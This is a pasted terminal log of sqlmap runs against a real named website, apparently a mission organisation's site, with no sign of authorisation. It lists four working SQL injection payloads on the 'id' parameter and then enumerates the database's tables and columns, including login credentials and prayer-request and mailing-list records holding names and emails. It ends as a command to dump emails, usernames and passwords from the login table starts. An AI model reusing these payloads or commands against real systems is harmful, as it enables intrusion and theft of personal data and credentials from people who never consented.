API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 28th, 2017
781
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.73 KB | None | 0 0
raw download clone embed print report
  1. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  2. |_ -| . | | | .'| . |
  3. |___|_ |_|_|_|_|__,| _|
  4. |_| |_| http://sqlmap.org
  5.  
  6. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  7.  
  8. [*] starting at 08:59:40
  9.  
  10. [08:59:40] [INFO] testing connection to the target URL
  11. [08:59:43] [INFO] heuristics detected web page charset 'ISO-8859-2'
  12. [08:59:43] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
  13. [08:59:44] [INFO] testing if the target URL is stable
  14. [08:59:45] [INFO] target URL is stable
  15. [08:59:45] [INFO] testing if GET parameter 'id' is dynamic
  16. [08:59:46] [WARNING] GET parameter 'id' does not appear dynamic
  17. [08:59:46] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
  18. [08:59:46] [INFO] testing for SQL injection on GET parameter 'id'
  19. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
  20. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
  21. [08:59:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  22. [08:59:58] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  23. [08:59:59] [WARNING] reflective value(s) found and filtering out
  24. [09:00:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  25. [09:00:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  26. [09:01:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
  27. [09:01:14] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)' injectable
  28. [09:01:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
  29. [09:01:15] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
  30. [09:01:15] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
  31. [09:01:15] [INFO] testing 'MySQL inline queries'
  32. [09:01:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
  33. [09:01:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
  34. [09:01:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
  35. [09:01:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  36. [09:01:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
  37. [09:01:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  38. [09:01:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
  39. [09:01:19] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
  40. [09:01:24] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  41. [09:01:24] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
  42. [09:01:30] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 OR time-based blind (SELECT)' injectable
  43. [09:01:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  44. [09:01:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  45. [09:01:31] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  46. [09:01:32] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  47. [09:01:35] [INFO] target URL appears to have 13 columns in query
  48. [09:01:41] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
  49. [09:01:41] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
  50. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  51. sqlmap identified the following injection point(s) with a total of 241 HTTP(s) requests:
  52. ---
  53. Parameter: id (GET)
  54. Type: boolean-based blind
  55. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  56. Payload: id=29 OR NOT 3833=3833#
  57.  
  58. Type: error-based
  59. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  60. Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  61.  
  62. Type: AND/OR time-based blind
  63. Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
  64. Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
  65.  
  66. Type: UNION query
  67. Title: Generic UNION query (NULL) - 13 columns
  68. Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  69. ---
  70. [09:02:32] [INFO] the back-end DBMS is MySQL
  71. web application technology: PHP 5.6.31, Apache 2.4.27
  72. back-end DBMS: MySQL 5.0
  73. [09:02:32] [INFO] fetching database names
  74. [09:02:32] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  75. [09:02:34] [INFO] the SQL query used returns 2 entries
  76. [09:02:34] [INFO] retrieved: information_schema
  77. [09:02:35] [INFO] retrieved: acfmissi_acfmdb
  78. available databases [2]:
  79. [*] acfmissi_acfmdb
  80. [*] information_schema
  81.  
  82. [09:02:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
  83. root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb --table
  84. _
  85. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  86. |_ -| . | | | .'| . |
  87. |___|_ |_|_|_|_|__,| _|
  88. |_| |_| http://sqlmap.org
  89.  
  90. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  91.  
  92. [*] starting at 09:03:10
  93.  
  94. [09:03:10] [INFO] resuming back-end DBMS 'mysql'
  95. [09:03:11] [INFO] testing connection to the target URL
  96. [09:03:13] [INFO] heuristics detected web page charset 'ISO-8859-2'
  97. sqlmap resumed the following injection point(s) from stored session:
  98. ---
  99. Parameter: id (GET)
  100. Type: boolean-based blind
  101. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  102. Payload: id=29 OR NOT 3833=3833#
  103.  
  104. Type: error-based
  105. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  106. Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  107.  
  108. Type: AND/OR time-based blind
  109. Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
  110. Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
  111.  
  112. Type: UNION query
  113. Title: Generic UNION query (NULL) - 13 columns
  114. Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  115. ---
  116. [09:03:13] [INFO] the back-end DBMS is MySQL
  117. web application technology: PHP 5.6.31, Apache 2.4.27
  118. back-end DBMS: MySQL 5.0
  119. [09:03:13] [INFO] fetching tables for database: 'acfmissi_acfmdb'
  120. [09:03:14] [INFO] the SQL query used returns 19 entries
  121. [09:03:15] [INFO] retrieved: announcement
  122. [09:03:16] [INFO] retrieved: article
  123. [09:03:17] [INFO] retrieved: comments
  124. [09:03:18] [INFO] retrieved: country
  125. [09:03:18] [INFO] retrieved: doctype
  126. [09:03:19] [INFO] retrieved: document
  127. [09:03:20] [INFO] retrieved: enquiry
  128. [09:03:21] [INFO] retrieved: events
  129. [09:03:22] [INFO] retrieved: eventtype
  130. [09:03:23] [INFO] retrieved: gallery
  131. [09:03:24] [INFO] retrieved: link
  132. [09:03:24] [INFO] retrieved: login
  133. [09:03:25] [INFO] retrieved: mail
  134. [09:03:26] [INFO] retrieved: news
  135. [09:03:27] [INFO] retrieved: news category
  136. [09:03:28] [INFO] retrieved: page
  137. [09:03:29] [INFO] retrieved: prayereq
  138. [09:03:30] [INFO] retrieved: testimony
  139. [09:03:30] [INFO] retrieved: userlogin
  140. Database: acfmissi_acfmdb
  141. [19 tables]
  142. +---------------+
  143. | news category |
  144. | announcement |
  145. | article |
  146. | comments |
  147. | country |
  148. | doctype |
  149. | document |
  150. | enquiry |
  151. | events |
  152. | eventtype |
  153. | gallery |
  154. | link |
  155. | login |
  156. | mail |
  157. | news |
  158. | page |
  159. | prayereq |
  160. | testimony |
  161. | userlogin |
  162. +---------------+
  163.  
  164. [09:03:31] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
  165. root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb --columns
  166. _
  167. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  168. |_ -| . | | | .'| . |
  169. |___|_ |_|_|_|_|__,| _|
  170. |_| |_| http://sqlmap.org
  171.  
  172. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  173.  
  174. [*] starting at 09:04:13
  175.  
  176. [09:04:14] [INFO] resuming back-end DBMS 'mysql'
  177. [09:04:15] [INFO] testing connection to the target URL
  178. [09:04:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
  179. sqlmap resumed the following injection point(s) from stored session:
  180. ---
  181. Parameter: id (GET)
  182. Type: boolean-based blind
  183. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  184. Payload: id=29 OR NOT 3833=3833#
  185.  
  186. Type: error-based
  187. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  188. Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  189.  
  190. Type: AND/OR time-based blind
  191. Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
  192. Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
  193.  
  194. Type: UNION query
  195. Title: Generic UNION query (NULL) - 13 columns
  196. Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  197. ---
  198. [09:04:18] [INFO] the back-end DBMS is MySQL
  199. web application technology: PHP 5.6.31, Apache 2.4.27
  200. back-end DBMS: MySQL 5.0
  201. [09:04:18] [INFO] fetching tables for database: 'acfmissi_acfmdb'
  202. [09:04:18] [INFO] the SQL query used returns 19 entries
  203. [09:04:18] [INFO] resumed: announcement
  204. [09:04:18] [INFO] resumed: article
  205. [09:04:18] [INFO] resumed: comments
  206. [09:04:18] [INFO] resumed: country
  207. [09:04:18] [INFO] resumed: doctype
  208. [09:04:18] [INFO] resumed: document
  209. [09:04:18] [INFO] resumed: enquiry
  210. [09:04:18] [INFO] resumed: events
  211. [09:04:18] [INFO] resumed: eventtype
  212. [09:04:18] [INFO] resumed: gallery
  213. [09:04:18] [INFO] resumed: link
  214. [09:04:18] [INFO] resumed: login
  215. [09:04:18] [INFO] resumed: mail
  216. [09:04:18] [INFO] resumed: news
  217. [09:04:18] [INFO] resumed: news category
  218. [09:04:18] [INFO] resumed: page
  219. [09:04:18] [INFO] resumed: prayereq
  220. [09:04:18] [INFO] resumed: testimony
  221. [09:04:18] [INFO] resumed: userlogin
  222. [09:04:18] [INFO] fetching columns for table 'announcement' in database 'acfmissi_acfmdb'
  223. [09:04:19] [INFO] the SQL query used returns 5 entries
  224. [09:04:20] [INFO] retrieved: "ID","int(12)"
  225. [09:04:21] [INFO] retrieved: "Content","text"
  226. [09:04:22] [INFO] retrieved: "Date","date"
  227. [09:04:23] [INFO] retrieved: "Title","varchar(200)"
  228. [09:04:24] [INFO] retrieved: "pic","varchar(100)"
  229. [09:04:24] [INFO] fetching columns for table 'prayereq' in database 'acfmissi_acfmdb'
  230. [09:04:25] [INFO] the SQL query used returns 4 entries
  231. [09:04:26] [INFO] retrieved: "id","int(34)"
  232. [09:04:27] [INFO] retrieved: "Name","varchar(80)"
  233. [09:04:27] [INFO] retrieved: "Email","varchar(80)"
  234. [09:04:28] [INFO] retrieved: "Prayer","text"
  235. [09:04:28] [INFO] fetching columns for table 'userlogin' in database 'acfmissi_acfmdb'
  236. [09:04:29] [INFO] the SQL query used returns 3 entries
  237. [09:04:30] [INFO] retrieved: "ID","int(18)"
  238. [09:04:31] [INFO] retrieved: "Username","varchar(49)"
  239. [09:04:32] [INFO] retrieved: "Password","varchar(56)"
  240. [09:04:32] [INFO] fetching columns for table 'mail' in database 'acfmissi_acfmdb'
  241. [09:04:33] [INFO] the SQL query used returns 5 entries
  242. [09:04:34] [INFO] retrieved: "id","int(18)"
  243. [09:04:34] [INFO] retrieved: "name","varchar(60)"
  244. [09:04:35] [INFO] retrieved: "email","varchar(80)"
  245. [09:04:36] [INFO] retrieved: "unsubscribed","varchar(100)"
  246. [09:04:37] [INFO] retrieved: "sendmsg","varchar(100)"
  247. [09:04:37] [INFO] fetching columns for table 'enquiry' in database 'acfmissi_acfmdb'
  248. [09:04:38] [INFO] the SQL query used returns 4 entries
  249. [09:04:39] [INFO] retrieved: "id","int(15)"
  250. [09:04:40] [INFO] retrieved: "Name","varchar(60)"
  251. [09:04:41] [INFO] retrieved: "Email","varchar(65)"
  252. [09:04:42] [INFO] retrieved: "Comment","varchar(250)"
  253. [09:04:42] [INFO] fetching columns for table 'country' in database 'acfmissi_acfmdb'
  254. [09:04:42] [INFO] the SQL query used returns 2 entries
  255. [09:04:43] [INFO] retrieved: "id","int(255) unsigned"
  256. [09:04:44] [INFO] retrieved: "country_name","varchar(255)"
  257. [09:04:44] [INFO] fetching columns for table 'testimony' in database 'acfmissi_acfmdb'
  258. [09:04:45] [INFO] the SQL query used returns 5 entries
  259. [09:04:46] [INFO] retrieved: "id","int(34)"
  260. [09:04:47] [INFO] retrieved: "Name","varchar(80)"
  261. [09:04:48] [INFO] retrieved: "Email","varchar(80)"
  262. [09:04:49] [INFO] retrieved: "Testimony","text"
  263. [09:04:49] [INFO] retrieved: "Dateposted","date"
  264. [09:04:49] [INFO] fetching columns for table 'doctype' in database 'acfmissi_acfmdb'
  265. [09:04:50] [INFO] the SQL query used returns 2 entries
  266. [09:04:51] [INFO] retrieved: "id","int(35)"
  267. [09:04:52] [INFO] retrieved: "documents","varchar(99)"
  268. [09:04:52] [INFO] fetching columns for table 'comments' in database 'acfmissi_acfmdb'
  269. [09:04:53] [INFO] the SQL query used returns 5 entries
  270. [09:04:54] [INFO] retrieved: "ID","int(18)"
  271. [09:04:55] [INFO] retrieved: "Name","varchar(100)"
  272. [09:04:56] [INFO] retrieved: "Email","varchar(100)"
  273. [09:04:57] [INFO] retrieved: "comments","text"
  274. [09:04:57] [INFO] retrieved: "visible","varchar(120)"
  275. [09:04:57] [INFO] fetching columns for table 'gallery' in database 'acfmissi_acfmdb'
  276. [09:04:58] [INFO] the SQL query used returns 5 entries
  277. [09:04:59] [INFO] retrieved: "id","int(16)"
  278. [09:05:00] [INFO] retrieved: "eventTitle","varchar(300)"
  279. [09:05:01] [INFO] retrieved: "pics","varchar(100)"
  280. [09:05:02] [INFO] retrieved: "pictitle","varchar(250)"
  281. [09:05:03] [INFO] retrieved: "Date","date"
  282. [09:05:03] [INFO] fetching columns for table 'link' in database 'acfmissi_acfmdb'
  283. [09:05:04] [INFO] the SQL query used returns 3 entries
  284. [09:05:05] [INFO] retrieved: "id","int(60)"
  285. [09:05:05] [INFO] retrieved: "LinkName","varchar(100)"
  286. [09:05:06] [INFO] retrieved: "link_order","varchar(100)"
  287. [09:05:06] [INFO] fetching columns for table 'eventtype' in database 'acfmissi_acfmdb'
  288. [09:05:07] [INFO] the SQL query used returns 2 entries
  289. [09:05:08] [INFO] retrieved: "id","int(55)"
  290. [09:05:09] [INFO] retrieved: "category","varchar(180)"
  291. [09:05:09] [INFO] fetching columns for table 'article' in database 'acfmissi_acfmdb'
  292. [09:05:10] [INFO] the SQL query used returns 10 entries
  293. [09:05:11] [INFO] retrieved: "Id","int(17)"
  294. [09:05:12] [INFO] retrieved: "Event","varchar(100)"
  295. [09:05:12] [INFO] retrieved: "Speaker","varchar(80)"
  296. [09:05:13] [INFO] retrieved: "Title","varchar(69)"
  297. [09:05:14] [INFO] retrieved: "Summary","varchar(280)"
  298. [09:05:15] [INFO] retrieved: "Article","longtext"
  299. [09:05:16] [INFO] retrieved: "Date","date"
  300. [09:05:18] [INFO] retrieved: "Dateposted","date"
  301. [09:05:18] [INFO] retrieved: "pics","varchar(100)"
  302. [09:05:19] [INFO] retrieved: "display","varchar(20)"
  303. [09:05:19] [INFO] fetching columns for table 'login' in database 'acfmissi_acfmdb'
  304. [09:05:20] [INFO] the SQL query used returns 6 entries
  305. [09:05:21] [INFO] retrieved: "ID","int(18)"
  306. [09:05:22] [INFO] retrieved: "username","varchar(25)"
  307. [09:05:23] [INFO] retrieved: "password","varchar(100)"
  308. [09:05:24] [INFO] retrieved: "name","varchar(35)"
  309. [09:05:25] [INFO] retrieved: "email","varchar(60)"
  310. [09:05:25] [INFO] retrieved: "level","varchar(25)"
  311. [09:05:25] [INFO] fetching columns for table 'document' in database 'acfmissi_acfmdb'
  312. [09:05:26] [INFO] the SQL query used returns 8 entries
  313. [09:05:27] [INFO] retrieved: "ID","int(16)"
  314. [09:05:28] [INFO] retrieved: "category","varchar(25)"
  315. [09:05:29] [INFO] retrieved: "Description","text"
  316. [09:05:30] [INFO] retrieved: "document","varchar(60)"
  317. [09:05:31] [INFO] retrieved: "date","date"
  318. [09:05:32] [INFO] retrieved: "doctitle","varchar(55)"
  319. [09:05:32] [INFO] retrieved: "display","varchar(20)"
  320. [09:05:33] [INFO] retrieved: "Pics","varchar(80)"
  321. [09:05:33] [INFO] fetching columns for table 'news' in database 'acfmissi_acfmdb'
  322. [09:05:34] [INFO] the SQL query used returns 12 entries
  323. [09:05:35] [INFO] retrieved: "ID","int(16)"
  324. [09:05:36] [INFO] retrieved: "Title","varchar(250)"
  325. [09:05:37] [INFO] retrieved: "News_Category","varchar(200)"
  326. [09:05:38] [INFO] retrieved: "Summary","varchar(350)"
  327. [09:05:39] [INFO] retrieved: "content","text"
  328. [09:05:39] [INFO] retrieved: "Date","date"
  329. [09:05:40] [INFO] retrieved: "Source","varchar(85)"
  330. [09:05:41] [INFO] retrieved: "pics","varchar(80)"
  331. [09:05:42] [INFO] retrieved: "file","varchar(80)"
  332. [09:05:43] [INFO] retrieved: "Postedby","varchar(80)"
  333. [09:05:44] [INFO] retrieved: "Display","varchar(80)"
  334. [09:05:45] [INFO] retrieved: "Main","varchar(29)"
  335. [09:05:45] [INFO] fetching columns for table 'events' in database 'acfmissi_acfmdb'
  336. [09:05:46] [INFO] the SQL query used returns 11 entries
  337. [09:05:46] [INFO] retrieved: "ID","int(18)"
  338. [09:05:47] [INFO] retrieved: "eventTitle","varchar(256)"
  339. [09:05:48] [INFO] retrieved: "StartDate","date"
  340. [09:05:49] [INFO] retrieved: "eventDuration","varchar(100)"
  341. [09:05:50] [INFO] retrieved: "eventType","varchar(85)"
  342. [09:05:51] [INFO] retrieved: "content","text"
  343. [09:05:52] [INFO] retrieved: "PaperTitle","varchar(256)"
  344. [09:05:53] [INFO] retrieved: "Author","varchar(35)"
  345. [09:05:53] [INFO] retrieved: "Status","varchar(25)"
  346. [09:05:54] [INFO] retrieved: "file","text"
  347. [09:05:55] [INFO] retrieved: "dateposted","date"
  348. [09:05:55] [INFO] fetching columns for table 'news category' in database 'acfmissi_acfmdb'
  349. [09:05:56] [INFO] the SQL query used returns 2 entries
  350. [09:05:57] [INFO] retrieved: "id","int(55)"
  351. [09:05:58] [INFO] retrieved: "Category","varchar(100)"
  352. [09:05:58] [INFO] fetching columns for table 'page' in database 'acfmissi_acfmdb'
  353. [09:05:59] [INFO] the SQL query used returns 13 entries
  354. [09:06:00] [INFO] retrieved: "id","int(24)"
  355. [09:06:01] [INFO] retrieved: "Pagetitle","varchar(80)"
  356. [09:06:01] [INFO] retrieved: "Mainpage","varchar(100)"
  357. [09:06:02] [INFO] retrieved: "linktype","varchar(100)"
  358. [09:06:03] [INFO] retrieved: "linkorder","varchar(100)"
  359. [09:06:04] [INFO] retrieved: "pics1","varchar(100)"
  360. [09:06:05] [INFO] retrieved: "Pics2","varchar(100)"
  361. [09:06:06] [INFO] retrieved: "Maincontent","text"
  362. [09:06:07] [INFO] retrieved: "Content1","text"
  363. [09:06:08] [INFO] retrieved: "Content2","text"
  364. [09:06:08] [INFO] retrieved: "Content3","text"
  365. [09:06:09] [INFO] retrieved: "Display","text"
  366. [09:06:10] [INFO] retrieved: "datecreated","date"
  367. Database: acfmissi_acfmdb
  368. Table: announcement
  369. [5 columns]
  370. +---------+--------------+
  371. | Column | Type |
  372. +---------+--------------+
  373. | Date | date |
  374. | Content | text |
  375. | ID | int(12) |
  376. | pic | varchar(100) |
  377. | Title | varchar(200) |
  378. +---------+--------------+
  379.  
  380. Database: acfmissi_acfmdb
  381. Table: page
  382. [13 columns]
  383. +-------------+--------------+
  384. | Column | Type |
  385. +-------------+--------------+
  386. | Content1 | text |
  387. | Content2 | text |
  388. | Content3 | text |
  389. | datecreated | date |
  390. | Display | text |
  391. | id | int(24) |
  392. | linkorder | varchar(100) |
  393. | linktype | varchar(100) |
  394. | Maincontent | text |
  395. | Mainpage | varchar(100) |
  396. | Pagetitle | varchar(80) |
  397. | pics1 | varchar(100) |
  398. | Pics2 | varchar(100) |
  399. +-------------+--------------+
  400.  
  401. Database: acfmissi_acfmdb
  402. Table: document
  403. [8 columns]
  404. +-------------+-------------+
  405. | Column | Type |
  406. +-------------+-------------+
  407. | date | date |
  408. | category | varchar(25) |
  409. | Description | text |
  410. | display | varchar(20) |
  411. | doctitle | varchar(55) |
  412. | document | varchar(60) |
  413. | ID | int(16) |
  414. | Pics | varchar(80) |
  415. +-------------+-------------+
  416.  
  417. Database: acfmissi_acfmdb
  418. Table: enquiry
  419. [4 columns]
  420. +---------+--------------+
  421. | Column | Type |
  422. +---------+--------------+
  423. | Comment | varchar(250) |
  424. | Email | varchar(65) |
  425. | id | int(15) |
  426. | Name | varchar(60) |
  427. +---------+--------------+
  428.  
  429. Database: acfmissi_acfmdb
  430. Table: country
  431. [2 columns]
  432. +--------------+-------------------+
  433. | Column | Type |
  434. +--------------+-------------------+
  435. | country_name | varchar(255) |
  436. | id | int(255) unsigned |
  437. +--------------+-------------------+
  438.  
  439. Database: acfmissi_acfmdb
  440. Table: testimony
  441. [5 columns]
  442. +------------+-------------+
  443. | Column | Type |
  444. +------------+-------------+
  445. | Dateposted | date |
  446. | Email | varchar(80) |
  447. | id | int(34) |
  448. | Name | varchar(80) |
  449. | Testimony | text |
  450. +------------+-------------+
  451.  
  452. Database: acfmissi_acfmdb
  453. Table: doctype
  454. [2 columns]
  455. +-----------+-------------+
  456. | Column | Type |
  457. +-----------+-------------+
  458. | documents | varchar(99) |
  459. | id | int(35) |
  460. +-----------+-------------+
  461.  
  462. Database: acfmissi_acfmdb
  463. Table: comments
  464. [5 columns]
  465. +----------+--------------+
  466. | Column | Type |
  467. +----------+--------------+
  468. | comments | text |
  469. | Email | varchar(100) |
  470. | ID | int(18) |
  471. | Name | varchar(100) |
  472. | visible | varchar(120) |
  473. +----------+--------------+
  474.  
  475. Database: acfmissi_acfmdb
  476. Table: events
  477. [11 columns]
  478. +---------------+--------------+
  479. | Column | Type |
  480. +---------------+--------------+
  481. | Author | varchar(35) |
  482. | content | text |
  483. | dateposted | date |
  484. | eventDuration | varchar(100) |
  485. | eventTitle | varchar(256) |
  486. | eventType | varchar(85) |
  487. | file | text |
  488. | ID | int(18) |
  489. | PaperTitle | varchar(256) |
  490. | StartDate | date |
  491. | Status | varchar(25) |
  492. +---------------+--------------+
  493.  
  494. Database: acfmissi_acfmdb
  495. Table: eventtype
  496. [2 columns]
  497. +----------+--------------+
  498. | Column | Type |
  499. +----------+--------------+
  500. | category | varchar(180) |
  501. | id | int(55) |
  502. +----------+--------------+
  503.  
  504. Database: acfmissi_acfmdb
  505. Table: link
  506. [3 columns]
  507. +------------+--------------+
  508. | Column | Type |
  509. +------------+--------------+
  510. | id | int(60) |
  511. | link_order | varchar(100) |
  512. | LinkName | varchar(100) |
  513. +------------+--------------+
  514.  
  515. Database: acfmissi_acfmdb
  516. Table: userlogin
  517. [3 columns]
  518. +----------+-------------+
  519. | Column | Type |
  520. +----------+-------------+
  521. | ID | int(18) |
  522. | Password | varchar(56) |
  523. | Username | varchar(49) |
  524. +----------+-------------+
  525.  
  526. Database: acfmissi_acfmdb
  527. Table: mail
  528. [5 columns]
  529. +--------------+--------------+
  530. | Column | Type |
  531. +--------------+--------------+
  532. | email | varchar(80) |
  533. | id | int(18) |
  534. | name | varchar(60) |
  535. | sendmsg | varchar(100) |
  536. | unsubscribed | varchar(100) |
  537. +--------------+--------------+
  538.  
  539. Database: acfmissi_acfmdb
  540. Table: article
  541. [10 columns]
  542. +------------+--------------+
  543. | Column | Type |
  544. +------------+--------------+
  545. | Date | date |
  546. | Article | longtext |
  547. | Dateposted | date |
  548. | display | varchar(20) |
  549. | Event | varchar(100) |
  550. | Id | int(17) |
  551. | pics | varchar(100) |
  552. | Speaker | varchar(80) |
  553. | Summary | varchar(280) |
  554. | Title | varchar(69) |
  555. +------------+--------------+
  556.  
  557. Database: acfmissi_acfmdb
  558. Table: prayereq
  559. [4 columns]
  560. +--------+-------------+
  561. | Column | Type |
  562. +--------+-------------+
  563. | Email | varchar(80) |
  564. | id | int(34) |
  565. | Name | varchar(80) |
  566. | Prayer | text |
  567. +--------+-------------+
  568.  
  569. Database: acfmissi_acfmdb
  570. Table: news
  571. [12 columns]
  572. +---------------+--------------+
  573. | Column | Type |
  574. +---------------+--------------+
  575. | Date | date |
  576. | content | text |
  577. | Display | varchar(80) |
  578. | file | varchar(80) |
  579. | ID | int(16) |
  580. | Main | varchar(29) |
  581. | News_Category | varchar(200) |
  582. | pics | varchar(80) |
  583. | Postedby | varchar(80) |
  584. | Source | varchar(85) |
  585. | Summary | varchar(350) |
  586. | Title | varchar(250) |
  587. +---------------+--------------+
  588.  
  589. Database: acfmissi_acfmdb
  590. Table: gallery
  591. [5 columns]
  592. +------------+--------------+
  593. | Column | Type |
  594. +------------+--------------+
  595. | Date | date |
  596. | eventTitle | varchar(300) |
  597. | id | int(16) |
  598. | pics | varchar(100) |
  599. | pictitle | varchar(250) |
  600. +------------+--------------+
  601.  
  602. Database: acfmissi_acfmdb
  603. Table: news category
  604. [2 columns]
  605. +----------+--------------+
  606. | Column | Type |
  607. +----------+--------------+
  608. | Category | varchar(100) |
  609. | id | int(55) |
  610. +----------+--------------+
  611.  
  612. Database: acfmissi_acfmdb
  613. Table: login
  614. [6 columns]
  615. +----------+--------------+
  616. | Column | Type |
  617. +----------+--------------+
  618. | level | varchar(25) |
  619. | email | varchar(60) |
  620. | ID | int(18) |
  621. | name | varchar(35) |
  622. | password | varchar(100) |
  623. | username | varchar(25) |
  624. +----------+--------------+
  625.  
  626. [09:06:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
  627. root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb -T login -C email,username,password,name,ID --dump
  628. _
  629. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  630. |_ -| . | | | .'| . |
  631. |___|_ |_|_|_|_|__,| _|
  632. |_| |_| http://sqlmap.org
  633.  
  634. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  635.  
